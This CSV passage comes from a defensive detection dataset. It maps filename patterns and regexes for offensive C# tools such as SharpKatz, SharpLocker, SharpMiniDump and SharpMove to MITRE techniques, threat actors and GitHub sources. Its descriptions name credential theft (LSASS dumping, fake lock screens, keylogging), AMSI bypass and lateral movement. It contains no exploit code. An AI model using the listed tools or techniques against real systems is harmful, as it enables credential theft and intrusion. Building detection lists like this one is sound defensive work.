T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","18588"
"*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18589"
"*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18590"
"*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18591"
"*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","SharpKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18592"
"*\SharpKatz.pdb*",".{0,1000}\\SharpKatz\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18593"
"*\SharpKatz.pdb*",".{0,1000}\\SharpKatz\.pdb.{0,1000}","offensive_tool_keyword","SharpKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18594"
"*\Sharp-Killer.sln*",".{0,1000}\\Sharp\-Killer\.sln.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","18595"
"*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18596"
"*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18597"
"*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18598"
"*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","SharpLAPS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18599"
"*\SharpLAPS.pdb*",".{0,1000}\\SharpLAPS\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18600"
"*\SharpLAPS.pdb*",".{0,1000}\\SharpLAPS\.pdb.{0,1000}","offensive_tool_keyword","SharpLAPS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18601"
"*\SharpLDAP\*",".{0,1000}\\SharpLDAP\\.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","18602"
"*\SharpLocker.csproj*",".{0,1000}\\SharpLocker\.csproj.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","18603"
"*\SharpLocker.exe*",".{0,1000}\\SharpLocker\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18604"
"*\SharpLocker.exe*",".{0,1000}\\SharpLocker\.exe.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","18605"
"*\SharpLocker-master*",".{0,1000}\\SharpLocker\-master.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","18606"
"*\SharpLogger.exe*",".{0,1000}\\SharpLogger\.exe.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","18607"
"*\Sharpmad.exe*",".{0,1000}\\Sharpmad\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18608"
"*\Sharpmad.exe*",".{0,1000}\\Sharpmad\.exe.{0,1000}","offensive_tool_keyword","Sharpmad","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18609"
"*\Sharpmad.pdb*",".{0,1000}\\Sharpmad\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18610"
"*\Sharpmad.pdb*",".{0,1000}\\Sharpmad\.pdb.{0,1000}","offensive_tool_keyword","Sharpmad","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18611"
"*\SharpMapExec.exe*",".{0,1000}\\SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18612"
"*\SharpMapExec.exe*",".{0,1000}\\SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18613"
"*\SharpMapExec.exe*",".{0,1000}\\SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","18614"
"*\SharpMapExec.sln*",".{0,1000}\\SharpMapExec\.sln.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","18615"
"*\SharpMapExec\*",".{0,1000}\\SharpMapExec\\.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","18616"
"*\SharpMiniDump.exe*",".{0,1000}\\SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18617"
"*\SharpMiniDump.exe*",".{0,1000}\\SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18618"
"*\SharpMiniDump-master*",".{0,1000}\\SharpMiniDump\-master.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","18619"
"*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","18620"
"*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18621"
"*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18622"
"*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18623"
"*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","SharpMove","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18624"
"*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","0","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","18625"
"*\SharpMove.sln*",".{0,1000}\\SharpMove\.sln.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","0","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","18626"
"*\SharpNamedPipePTH.exe*",".{0,1000}\\SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18627"
"*\SharpNamedPipePTH.exe*",".{0,1000}\\SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18628"
"*\SharpNBTScan.sln*",".{0,1000}\\SharpNBTScan\.sln.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","18629"
"*\SharpNBTScan-main*",".{0,1000}\\SharpNBTScan\-main.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","18630"
"*\SharpNetCheck.exe*",".{0,1000}\\SharpNetCheck\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18631"
"*\SharpNoPSExec*",".{0,1000}\\SharpNoPSExec.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","18632"
"*\SharpNoPSExec.exe*",".{0,1000}\\SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18633"
"*\SharpNoPSExec.exe*",".{0,1000}\\SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18634"
"*\SharpOXID-Find.exe*",".{0,1000}\\SharpOXID\-Find\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18635"
